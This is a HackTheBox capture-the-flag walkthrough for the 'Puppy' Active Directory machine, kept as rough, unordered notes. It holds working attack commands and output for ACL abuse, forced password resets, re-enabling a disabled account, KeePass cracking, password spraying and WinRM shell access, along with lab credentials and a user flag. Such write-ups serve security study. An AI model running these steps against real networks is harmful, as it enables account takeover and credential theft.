Here is my note on PUPPY from Hackthebox.
PUPPY: 10.129.59.251
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
levi.james / KingofAkron2025!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
sudo bloodhound-python -u 'levi.james' -p 'KingofAkron2025!' -ns 10.129.59.251 -d puppy.htb -c all
levi.james -> Member of HR Group -> GenericWrite -> Developers@Puppy.HTB GROUP
net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251
net rpc group members "Developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# net rpc group members "Developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.129.59.251
PUPPY\levi.james
PUPPY\ant.edwards
PUPPY\adam.silver
PUPPY\jamie.williams
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# crackmapexec smb 10.129.59.251 -u levi.james -p 'KingofAkron2025!' --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.59.251 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.59.251 445 DC [+] Enumerated shares
SMB 10.129.59.251 445 DC Share Permissions Remark
SMB 10.129.59.251 445 DC ----- ----------- ------
SMB 10.129.59.251 445 DC ADMIN$ Remote Admin
SMB 10.129.59.251 445 DC C$ Default share
SMB 10.129.59.251 445 DC DEV READ DEV-SHARE for PUPPY-DEVS
SMB 10.129.59.251 445 DC IPC$ READ Remote IPC
SMB 10.129.59.251 445 DC NETLOGON READ Logon server share
SMB 10.129.59.251 445 DC SYSVOL READ Logon server share
GenericAll to the Disabled User Account:
ant.edwards -> Member of SENIOR DEVS Group -> Genericall -> ADAM.SILVER User -> Member of Remote Manager User Group = USER-SHELL !
net rpc password "adam.silver" 'Password123!' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.129.59.251
faketime -f $(ntpdate -q dc.puppy.htb | awk '{print $4}') bash
crackmapexec smb 10.129.59.251 -u adam.silver -p Password123
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.59.251 445 DC [-] PUPPY.HTB\adam.silver:Password123 STATUS_ACCOUNT_DISABLED
#Account-Disabled though !
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# bloodyAD -u ant.edwards -d puppy.htb -p Antman2025! --host 10.129.113.196 remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# crackmapexec smb 10.129.113.196 -u adam.silver -p Password123!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.113.196 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.113.196 445 DC [+] PUPPY.HTB\adam.silver:Password123!
Account-Enabled !
https://notes.incendium.rocks/pentesting-notes/windows-pentesting/tools/bloodyad
evil-winrm -i 10.129.113.196 -u adam.silver -p Password123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Documents> hostname
DC
USER-SHELL !
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir
Directory: C:\Users\adam.silver\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/27/2025 4:31 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
Don't Work and Don't Bother !
targetedKerberoast.py -v -d 'puppy.htb' -u 'ant.edwards' -p 'Antman2025!'
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'puppy.htb' -u 'ant.edwards' -p 'Antman2025!'
faketime -f $(ntpdate -q dc.puppy.htb | awk '{print $4}') bash
crackmapexec smb 10.129.59.251 -u adam.silver -p Password123
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.59.251 445 DC [-] PUPPY.HTB\adam.silver:Password123 STATUS_ACCOUNT_DISABLED
#Account-Disabled though !
Kerberos
pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "list"
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "list"
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "puppy.htb" -u "ant.edwards" -p 'Antman2025!' --target "adam.silver" --action "add"
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/gettgtpkinit.py -cert-pfx "vixPsCQ0.pfx" -pfx-pass "RcjN0rbpB9J9KkCdTSu9" "puppy.htb"/"adam.silver" adam-silver_shadow.ccache
export KRB5CCNAME=adam-silver_shadow.ccache
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/getnthash.py puppy.htb/adam.silver -key ddfea8610c5e634577a7fbe5352990e1327649bbad61335f180b7df9d4e6c462
certipy cert -export -pfx "FYYdEZPX.pfx" -password "bW102Bl162SUxGuDns6L" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username adam.silver -domain puppy.htb
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/PKINITtools/gettgtpkinit.py -cert-pfx "FYYdEZPX.pfx" -pfx-pass "bW102Bl162SUxGuDns6L" "puppy.htb"/"adam.silver" output_TGT.ccache
certipy cert -export -pfx "FYYdEZPX.pfx" -password "bW102Bl162SUxGuDns6L" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username "$USER" -domain "$DOMAIN"
certipy shadow auto -u "ant.edwards"@"puppy.htb" -p 'Antman2025!' -account "adam.silver"
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u adam.silver -p 'Password123!'
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.228.110 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.228.110 445 DC [-] PUPPY.HTB\adam.silver:Password123! STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# net rpc password "adam.silver" 'Password123!' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.129.228.110
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u adam.silver -p 'Password123!'
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.228.110 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.228.110 445 DC [-] PUPPY.HTB\adam.silver:Password123! STATUS_ACCOUNT_DISABLED
#Overpass the hash maybe ?
getTGT.py puppy.htb/adam.silver:Password123! -dc-ip 10.129.228.110
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/C.Neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Adam D. Silver
sn: Silver
givenName: Adam
initials: D
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
instanceType: 4
whenCreated: 20250219121623.0Z
whenChanged: 20250523010429.0Z
displayName: Adam D. Silver
uSNCreated: 12814
memberOf: CN=DEVELOPERS,DC=PUPPY,DC=HTB
memberOf: CN=Remote Management Users,CN=Builtin,DC=PUPPY,DC=HTB
#This is not about kerberosting or complicated shadow credentials attacks and stuff like that.
#NOPE, Kerberos session error no kerberos and shadow credentials attacks and stuff like that.
sudo bloodhound-python -u 'ant.edwards' -p 'Antman2025!' -ns 10.129.128.95 -d puppy.htb -c all
rpcclient -U "puppy.htb\\ant.edwards" dc.puppy.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-23 00:30:49Z)
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# GetUserSPNs.py -request -dc-ip 10.129.59.251 puppy.htb/levi.james:KingofAkron2025!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# GetNPUsers.py -dc-ip 10.129.59.251 puppy.htb/ -usersfile users.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User levi.james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ant.edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User jamie.williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steph.cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steph.cooper_adm doesn't have UF_DONT_REQUIRE_PREAUTH set
#NOPE, No Asreproasting and Kerberoasting !
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.59.251 -x -W -D "levi.james@puppy.htb" -b "dc=puppy,dc=htb"
KingofAkron2025!
ldapsearch -H ldap://10.129.59.251 -x -W -D "levi.james@puppy.htb" -b "dc=puppy,dc=htb" '(objectClass=person)' > ldap-people
#NOPE and NO password and interesting description = NOPE !
445/tcp open microsoft-ds?
crackmapexec smb 10.129.59.251 -u levi.james -p KingofAkron2025! --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.59.251 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.59.251 445 DC [+] Enumerated shares
SMB 10.129.59.251 445 DC Share Permissions Remark
SMB 10.129.59.251 445 DC ----- ----------- ------
SMB 10.129.59.251 445 DC ADMIN$ Remote Admin
SMB 10.129.59.251 445 DC C$ Default share
SMB 10.129.59.251 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.129.59.251 445 DC IPC$ READ Remote IPC
SMB 10.129.59.251 445 DC NETLOGON READ Logon server share
SMB 10.129.59.251 445 DC SYSVOL READ Logon server share
sudo lookupsid.py levi.james@10.129.59.251 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/10.129.59.251/SYSVOL]
└─# smbclient \\\\10.129.59.251\\SYSVOL -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 21 01:33:44 2025
.. D 0 Wed Feb 19 06:44:57 2025
lvRxjnmZBA D 0 Fri Mar 21 01:33:44 2025
PUPPY.HTB Dr 0 Wed Feb 19 06:44:57 2025
UltFsQYRGg.txt A 0 Fri Mar 21 01:33:44 2025
5080575 blocks of size 4096. 1546094 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
comment.cmtx:
<?xml version='1.0' encoding='utf-8'?>
<policyComments xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/CommentDefinitions">
<policyNamespaces>
<using prefix="ns0" namespace="Microsoft.Policies.WindowsDefender"></using>
</policyNamespaces>
<comments>
<admTemplate></admTemplate>
</comments>
<resources minRequiredRevision="1.0">
<stringTable></stringTable>
</resources>
</policyComments>
#NOPE and NOTHING INTERESTING in SYSVOL share !
#After BloodHound Attack.
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/BLOOD]
└─# crackmapexec smb 10.129.59.251 -u levi.james -p 'KingofAkron2025!' --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.59.251 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.59.251 445 DC [+] Enumerated shares
SMB 10.129.59.251 445 DC Share Permissions Remark
SMB 10.129.59.251 445 DC ----- ----------- ------
SMB 10.129.59.251 445 DC ADMIN$ Remote Admin
SMB 10.129.59.251 445 DC C$ Default share
SMB 10.129.59.251 445 DC DEV READ DEV-SHARE for PUPPY-DEVS
SMB 10.129.59.251 445 DC IPC$ READ Remote IPC
SMB 10.129.59.251 445 DC NETLOGON READ Logon server share
SMB 10.129.59.251 445 DC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# smbclient \\\\10.129.59.251\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025
5080575 blocks of size 4096. 1544991 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \KeePassXC-2.7.9-Win64.msi of size 34394112 as KeePassXC-2.7.9-Win64.msi (1215.7 KiloBytes/sec) (average 1215.7 KiloBytes/sec)
getting file \recovery.kdbx of size 2677 as recovery.kdbx (20.0 KiloBytes/sec) (average 1210.1 KiloBytes/sec)
KDBX4 - KeePass 4 Password Cracking:
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# ls
KeePassXC-2.7.9-Win64.msi Projects recovery.kdbx
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# kpcli --kdb recovery.kdbx
KDBX4 files are not directly supported, but they can be imported.
- The KDBX format is supported through version 3.1.
- To import a KDBX v4 file, use the import command.
- For details, see: help import
#Use keepassxc-cli instead.
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# ls
KeePassXC-2.7.9-Win64.msi Projects recovery.hashes recovery.kdbx
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# keepassxc-cli ls recovery.kdbx
Enter password to unlock recovery.kdbx:
https://github.com/r3nt0n/keepass4brute
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/DEV]
└─# cd keepass4brute
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ls
keepass4brute.sh LICENSE README.md recovery.kdbx
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ./keepass4brute.sh
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
Usage ./keepass4brute.sh <kdbx-file> <wordlist>
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# ./keepass4brute.sh recovery.kdbx /usr/share/seclists/Passwords/darkweb2017-top10000.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 126/9999 - Attempts per minute: 31 - Estimated time remaining: 5 hours, 18 minutes
[+] Current attempt: liverpool
[*] Password found: liverpool
#PASSWORD FOUND ! liverpool
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli ls recovery.kdbx
Enter password to unlock recovery.kdbx:
JAMIE WILLIAMSON
ADAM SILVER
ANTONY C. EDWARDS
STEVE TUCKER
SAMUEL BLAKE
-WORKS !
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "JAMIE WILLIAMSON"
Enter password to unlock recovery.kdbx:
Title: JAMIE WILLIAMSON
UserName:
Password: JamieLove2025!
URL: puppy.htb
Notes:
Uuid: {5f112cf4-85ed-4d4d-bf0e-5e35da983367}
Tags:
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "ADAM SILVER"
Enter password to unlock recovery.kdbx:
Title: ADAM SILVER
UserName:
Password: HJKL2025!
URL: puppy.htb
Notes:
Uuid: {387b31a3-4a42-4352-ad9a-a42a70fa19f5}
Tags:
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "ANTONY C. EDWARDS"
Enter password to unlock recovery.kdbx:
Title: ANTONY C. EDWARDS
UserName:
Password: Antman2025!
URL: puppy.htb
Notes:
Uuid: {bfd9590f-b0c6-41f8-b2f5-7e6c5defa5e2}
Tags:
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "STEVE TUCKER"
Enter password to unlock recovery.kdbx:
Title: STEVE TUCKER
UserName:
Password: Steve2025!
URL: puppy.htb
Notes:
Uuid: {d51a238d-4fe4-4ede-bb83-e6bb6e48a0a1}
Tags:
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/DEV/keepass4brute]
└─# keepassxc-cli show -s recovery.kdbx "SAMUEL BLAKE"
Enter password to unlock recovery.kdbx:
Title: SAMUEL BLAKE
UserName:
Password: ILY2025!
URL: puppy.htb
Notes:
Uuid: {d17c1358-f48b-4865-8ab6-15484dccb69b}
Tags:
pass.txt:
KingofAkron2025!
JamieLove2025!
HJKL2025!
Antman2025!
Steve2025!
ILY2025!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# cat pass.txt
KingofAkron2025!
JamieLove2025!
HJKL2025!
Antman2025!
Steve2025!
ILY2025!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.59.251 -u users.txt -p pass.txt --continue-on-success | grep "[+]"
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.59.251 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.59.251 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
ant.edwards:Antman2025!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/10.129.59.251]
└─# crackmapexec smb 10.129.228.110 -u ant.edwards -p Antman2025! --shares
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.228.110 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.228.110 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.129.228.110 445 DC [+] Enumerated shares
SMB 10.129.228.110 445 DC Share Permissions Remark
SMB 10.129.228.110 445 DC ----- ----------- ------
SMB 10.129.228.110 445 DC ADMIN$ Remote Admin
SMB 10.129.228.110 445 DC C$ Default share
SMB 10.129.228.110 445 DC DEV READ,WRITE DEV-SHARE for PUPPY-DEVS
SMB 10.129.228.110 445 DC IPC$ READ Remote IPC
SMB 10.129.228.110 445 DC NETLOGON READ Logon server share
SMB 10.129.228.110 445 DC SYSVOL READ Logon server share
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open status 1 (RPC #100024)
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# showmount -e 10.129.59.251
Export list for 10.129.59.251:
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# showmount -e 10.129.59.251
Export list for 10.129.59.251:
#NOPE, EMPTY and DON'T BOTHER !
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
evil-winrm -i 10.129.113.196 -u adam.silver -p Password123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Documents> hostname
DC
USER-SHELL !
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> whoami
puppy\adam.silver
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir
Directory: C:\Users\adam.silver\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/27/2025 4:31 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
bfbeb0b07aef036d053ef5d6178e86a5
USER.TXT: bfbeb0b07aef036d053ef5d6178e86a5
adam.silver -> steph.cooper:
*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> dir
Directory: C:\Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip
Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
Info: Download successful!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# mv site-backup-2024-12-30.zip site-backup
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# cd site-backup
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# ls
site-backup-2024-12-30.zip
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# unzip site-backup-2024-12-30.zip
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# cd puppy
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/site-backup/puppy]
└─# ls
assets images index.html nms-auth-config.xml.bak
┌──(root㉿kali)-[/home/…/BOXES/PUPPY/site-backup/puppy]
└─# cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
steph.cooper:ChefSteph2025!
steph.cooper credential discovered !
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# crackmapexec smb 10.129.113.196 -u steph.cooper -p ChefSteph2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.1
1) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.113.196 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.113.196 445 DC [+] PUPPY.HTB\steph.cooper:ChefSteph2025!
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# crackmapexec winrm 10.129.113.196 -u steph.cooper -p ChefSteph2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.1
1) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.113.196 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:PUPPY.HTB)
HTTP 10.129.113.196 5985 DC [*] http://10.129.113.196:5985/wsman
WINRM 10.129.113.196 5985 DC [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# evil-winrm -i 10.129.113.196 -u steph.cooper -p ChefSteph2025!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
